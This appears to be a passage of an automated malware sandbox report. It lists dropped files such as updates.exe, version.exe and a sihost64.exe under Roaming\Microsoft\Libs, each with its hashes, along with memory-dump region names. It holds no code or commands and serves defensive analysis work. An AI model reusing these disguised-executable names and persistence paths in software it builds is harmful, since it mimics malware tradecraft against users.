| SHA1 | 2f439c19eb172cf7235b1497d4859fae4b77af42 |
| SHA256 | 75d8c02ce367c2c9fa14ae9226056f2428538f95ebc8728b935d4c927f6d065c |
| SHA512 | 915da2e1709c0d30e76b0d1487ca974fd6742fb27d978f6fa83632e3a43cfe44fa24c5101453259981759c28a928be77e411b68abb3140961bfe9185f9caca9b |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\version.exe
| MD5 | f6a7ae96b4241a5dee91bcd8d46234dd |
| SHA1 | 2f439c19eb172cf7235b1497d4859fae4b77af42 |
| SHA256 | 75d8c02ce367c2c9fa14ae9226056f2428538f95ebc8728b935d4c927f6d065c |
| SHA512 | 915da2e1709c0d30e76b0d1487ca974fd6742fb27d978f6fa83632e3a43cfe44fa24c5101453259981759c28a928be77e411b68abb3140961bfe9185f9caca9b |
memory/2416-1273-0x000000001B490000-0x000000001B4A0000-memory.dmp
memory/2416-1274-0x000000001B490000-0x000000001B4A0000-memory.dmp
memory/3328-1275-0x00000000008C0000-0x00000000008C8000-memory.dmp
memory/3560-1282-0x000001F37BDE0000-0x000001F37BE02000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_cdd4zsuw.nz2.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3560-1314-0x000001F37BE80000-0x000001F37BE90000-memory.dmp
memory/3560-1315-0x000001F37BE80000-0x000001F37BE90000-memory.dmp
memory/2836-1316-0x000001ABF8D70000-0x000001ABF8D80000-memory.dmp
memory/2836-1317-0x000001ABF8D70000-0x000001ABF8D80000-memory.dmp
memory/4276-1318-0x000002A520300000-0x000002A520310000-memory.dmp
memory/3560-1319-0x000001F37BE80000-0x000001F37BE90000-memory.dmp
memory/1780-1320-0x0000014967EF0000-0x0000014967F00000-memory.dmp
memory/2836-1321-0x000001ABF8D70000-0x000001ABF8D80000-memory.dmp
memory/3560-1322-0x000001F37BE80000-0x000001F37BE90000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | d85ba6ff808d9e5444a4b369f5bc2730 |
| SHA1 | 31aa9d96590fff6981b315e0b391b575e4c0804a |
| SHA256 | 84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f |
| SHA512 | 8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 6d3e9c29fe44e90aae6ed30ccf799ca8 |
| SHA1 | c7974ef72264bbdf13a2793ccf1aed11bc565dce |
| SHA256 | 2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d |
| SHA512 | 60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | d28a889fd956d5cb3accfbaf1143eb6f |
| SHA1 | 157ba54b365341f8ff06707d996b3635da8446f7 |
| SHA256 | 21e5d7ccf80a293e6ba30ed728846ca19c929c52b96e2c8d34e27cd2234f1d45 |
| SHA512 | 0b6d88deb9be85722e6a78d5886d49f2caf407a59e128d2b4ed74c1356f9928c40048a62731959f2460e9ff9d9feee311043d2a37abe3bb92c2b76a44281478c |
memory/1316-1332-0x0000000000400000-0x000000000040C000-memory.dmp
memory/3456-1335-0x0000000008200000-0x0000000008210000-memory.dmp
memory/3456-1336-0x0000000008200000-0x0000000008210000-memory.dmp
memory/1316-1337-0x0000000004FB0000-0x0000000004FC0000-memory.dmp
memory/500-1338-0x0000000005530000-0x0000000005540000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\updates.exe
| MD5 | 364d64feddb1df47bf70b0d1006e4829 |
| SHA1 | 6a6405fa10ea2cc8009b3b81e13e5c10535f7efb |
| SHA256 | bbc2ff98d89352331a92cc47eb6114a5e05cb5ba3c31924717d36af4d9690574 |
| SHA512 | 6e104a8a6bd8ade6fdd0e82f5e7f92dcda84626737dbfea7df1bb4ea0365efae71dd51d3dc4399a1fd27da9398dbdbaa17ea2146babf2c06c632d5d5cbec2837 |
memory/4584-1342-0x0000000000C40000-0x0000000000E62000-memory.dmp
memory/4584-1343-0x00000000016C0000-0x00000000016D0000-memory.dmp
memory/1316-1344-0x0000000004FB0000-0x0000000004FC0000-memory.dmp
memory/1368-1355-0x000002310B030000-0x000002310B040000-memory.dmp
memory/3628-1371-0x00000272F16D0000-0x00000272F16E0000-memory.dmp
memory/3628-1372-0x00000272F16D0000-0x00000272F16E0000-memory.dmp
memory/4436-1387-0x000001B935A80000-0x000001B935A90000-memory.dmp
memory/4436-1388-0x000001B935A80000-0x000001B935A90000-memory.dmp
memory/4436-1389-0x000001B935A80000-0x000001B935A90000-memory.dmp
memory/4584-1393-0x00000000016C0000-0x00000000016D0000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
| MD5 | 5dd22e74d6c217412eb8c75e08b25171 |
| SHA1 | e4dfc26cdbcecfef0ef21c6b0988b3699d858c44 |
| SHA256 | c4fb4643cc28e909b872b3c899e796a592154e0e6b702e762e956c71f8c54e06 |
| SHA512 | e3a616ae3e1956c115a613d92db76a1f9a4115f73b1a8cb964f42b10eb296c97b04af42690f3a66339aedf259cee518d868a17f692c371fd4d174cc07bb6b151 |
C:\Users\Admin\AppData\Local\Temp\updates.exe
| MD5 | 364d64feddb1df47bf70b0d1006e4829 |
| SHA1 | 6a6405fa10ea2cc8009b3b81e13e5c10535f7efb |
| SHA256 | bbc2ff98d89352331a92cc47eb6114a5e05cb5ba3c31924717d36af4d9690574 |
| SHA512 | 6e104a8a6bd8ade6fdd0e82f5e7f92dcda84626737dbfea7df1bb4ea0365efae71dd51d3dc4399a1fd27da9398dbdbaa17ea2146babf2c06c632d5d5cbec2837 |
memory/3684-1411-0x0000000000130000-0x0000000000138000-memory.dmp
memory/1632-1448-0x00000000010A0000-0x00000000010B0000-memory.dmp
memory/3684-1449-0x0000000000E90000-0x0000000000EA0000-memory.dmp
memory/1140-1450-0x000002829BFA0000-0x000002829BFB0000-memory.dmp
memory/1140-1455-0x000002829BFA0000-0x000002829BFB0000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\TSPDOR~1.EXE
| MD5 | 560cb4c22eef8363ad5a68115c1e1d68 |
| SHA1 | ed7de753e52433abbfc9c40b4d93c17989e7af0e |
| SHA256 | f408d849ff9173f5d155c2f62ee6fd206c0c3a343ee42699baeb9c44a4787030 |
| SHA512 | cf4f8944784662d27bb4056982e334941531039cc39ab8f3e828cda68f8833c6e0a318aeb278166d8377ecd6a40281bf2f77a611bf073e78da877e229cd7a0a0 |
memory/4516-1502-0x0000000005590000-0x00000000055A0000-memory.dmp
memory/4516-1503-0x0000000005590000-0x00000000055A0000-memory.dmp
memory/1632-1504-0x000000001C1A0000-0x000000001C1B2000-memory.dmp
memory/2876-1526-0x0000000140000000-0x0000000140758000-memory.dmp
memory/2876-1525-0x0000000140000000-0x0000000140758000-memory.dmp
memory/2876-1527-0x0000000140000000-0x0000000140758000-memory.dmp
memory/2876-1530-0x0000000001200000-0x0000000001220000-memory.dmp
memory/2876-1543-0x0000000140000000-0x0000000140758000-memory.dmp
memory/2876-1544-0x0000000140000000-0x0000000140758000-memory.dmp
memory/2876-1545-0x0000000140000000-0x0000000140758000-memory.dmp
memory/2876-1546-0x0000000140000000-0x0000000140758000-memory.dmp
memory/2876-1547-0x0000000140000000-0x0000000140758000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Settings\language.txt
| MD5 | a54755df5bde02687d657e9703763c8a |
| SHA1 | 0af546d58ada5760bf6451de7b72fb2e125687c1 |
| SHA256 | 93eaaad295c94f5b52113b9032a16310e01a620e52557e4db08d826914bef869 |
| SHA512 | e1e6a9a91bd2089e3c95617b4912237590c92e8e4dda045ded142431ace2103110b303129102f2171d2a6b9ca79eea70839d37cbf572fa6e49f69b3e25f2d626 |